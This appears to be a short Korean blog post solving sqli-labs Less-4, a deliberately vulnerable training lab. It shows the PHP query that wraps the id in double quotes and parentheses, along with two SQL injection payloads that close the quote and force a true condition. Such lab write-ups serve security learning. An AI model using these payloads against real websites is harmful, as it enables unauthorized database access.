티스토리

sonyCYDFsame
검색하기내 프로필
웹 해킹/sqli-labs-master

Less4-GET-Error based-Double Quotes-String

sonysame 2019. 3. 4. 22:09

$id = '"' . $id . '"';

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

?id=") or 1=1 --%20

?id=") or "1"=("1

저작자표시 (새창열림)

블로그 정보

sonyCYDFsame

구독하기
sonyCYDFsame, 블로그 홈
댓글수0
문의안내
  • 티스토리
  • 로그인
  • 고객센터
© Kakao Corp.